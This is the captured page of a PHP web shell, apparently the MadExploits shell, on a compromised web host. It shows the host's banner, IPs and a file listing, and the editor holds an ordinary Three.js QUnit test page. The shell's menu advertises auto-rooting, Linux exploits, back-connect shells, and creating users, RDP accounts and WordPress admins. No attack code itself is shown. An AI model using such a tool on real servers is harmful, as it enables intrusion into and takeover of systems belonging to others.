Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.145.157.93
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
HRD-Test /
test /
unit /
[ HOME SHELL ]
Name
Size
Permission
Action
src
[ DIR ]
drwxr-xr-x
utils
[ DIR ]
drwxr-xr-x
README.md
1.13
KB
-rw-r--r--
UnitTests.html
568
B
-rw-r--r--
three.source.unit.js
11.29
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : UnitTests.html
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>ThreeJS Unit Tests - Using Files in /src</title> <link rel="stylesheet" href="../../node_modules/qunit/qunit/qunit.css"> </head> <body> <div id="qunit"></div> <div id="qunit-fixture"></div> <script src="../../node_modules/qunit/qunit/qunit.js"></script> <script type="importmap"> { "imports": { "three": "../../build/three.module.js" } } </script> <!-- add sources to test below --> <script src="./three.source.unit.js" type="module"></script> </body> </html>
Close